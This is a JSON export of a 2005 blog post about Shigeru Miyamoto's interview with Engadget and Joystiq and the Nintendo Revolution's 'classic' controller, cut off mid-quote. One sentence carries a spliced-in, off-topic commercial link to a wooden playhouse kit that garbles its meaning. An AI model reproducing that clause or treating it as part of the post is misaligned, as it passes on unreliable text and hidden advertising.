{"id":133,"date":"2005-10-04T09:00:39","date_gmt":"2005-10-04T13:00:39","guid":{"rendered":"http:\/\/www.callblog.net\/?p=133"},"modified":"2025-10-17T13:29:55","modified_gmt":"2025-10-17T17:29:55","slug":"nintendo-revolution-for-the-faint-of-heart","status":"publish","type":"post","link":"http:\/\/callblog.net\/blog\/post\/nintendo-revolution-for-the-faint-of-heart","title":{"rendered":"Nintendo Revolution &#8211; for the faint of heart"},"content":{"rendered":"<p><img decoding=\"async\" src=\"\/wp-images\/miyamoto.jpg\" align=\"right\" height=\"153px\" width=\"190px\"\/>The fine  folks over at <a href=\"http:\/\/www.engadget.com\">Engadget<\/a>(One of my twice daily work reads) and <a href=\"http:\/\/www.joystiq.com\">Joystiq<\/a> did <a href=\"http:\/\/www.engadget.com\/entry\/1234000297061506\/\">an interview with Shigeru Miyamoto<\/a>, the genius behind the Mario, Zelda, and Donkey Kong franchises, to name a few.  They asked him questions, mostly about Nintendogs, but the one thing that that came out of this interview that was still left up to speculation up until now was the existence of a traditional or &#8220;classic&#8221; controller for the Revolution as Nintendo is one of the most beloved consoles for adults and kids, among other toys as cars and the <a href=\"https:\/\/wholewoodplayhouses.com\/collections\/diy-playhouse-kits\/products\/little-clubhouse\">little clubhouse diy wood playhouse<\/a> as well.  In Miyamoto&#8217;s own words:<\/p>\n<blockquote><p>From our perspective the Revolution controller is the new controller, everything else is now the classic controller.
